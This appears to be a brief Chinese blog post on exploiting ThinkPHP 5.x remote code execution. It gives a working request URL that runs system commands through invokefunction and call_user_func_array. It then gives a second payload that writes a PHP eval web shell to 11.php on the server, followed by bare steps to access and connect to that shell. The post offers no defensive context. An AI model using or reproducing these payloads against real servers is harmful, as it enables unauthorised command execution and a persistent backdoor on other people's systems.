Thinkphp5x远程命令执行及getshell

养只小羊72024-08-09 0:39

访问到网址

拼接网址,执行远程命令

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可执行php命令

getshell

/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" >11.php

访问木马

连接木马

相关推荐
mooyuan天天1 小时前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)
web安全·信息泄露·ctfhub·svn泄露·源码泄露·dvcs ripper
unable code3 小时前
攻防世界-Web-easyupload
网络安全·web·ctf
Bruce_Liuxiaowei6 小时前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
YoungLime13 小时前
DVWA靶场之十三:CSP 绕过(Content Security Policy (CSP) Bypass)
网络·安全·web安全
YoungLime15 小时前
DVWA靶场之一:暴力破解(Brute Force)
web安全
YoungLime1 天前
DVWA靶场之三:跨站请求伪造(CSRF)
网络·安全·web安全
witkey_ak98961 天前
网安面试题收集(1)
网络安全
YoungLime1 天前
DVWA靶场之十二:储存型 XSS(Stored Cross Site Scripting (XSS))
网络·安全·web安全
galaxylove2 天前
Gartner发布网络弹性指南:将业务影响评估(BIA)嵌入网络弹性策略的核心,重点保护基础设施和关键业务系统
网络·安全·web安全
网安INF2 天前
【论文阅读】-《SparseFool: a few pixels make a big difference》
论文阅读·人工智能·深度学习·网络安全·黑盒攻击
热门推荐
01两千字总结:Codex 国内如何安装和使用的教程,以及如何设置中文回答02GitHub 镜像站点03KGG转MP3工具|非KGM文件|解密音频04UV安装并设置国内源05Linux下V2Ray安装配置指南06jdk21下载、安装(Windows、Linux、macOS)07BongoCat - 跨平台键盘猫动画工具08PHP htmlspecialchars()函数详解09Claude Code & 智谱GLM-4.5 环境配置指南 (Windows/macOS/Ubuntu)1046个Nano-banana 精选提示词,持续更新中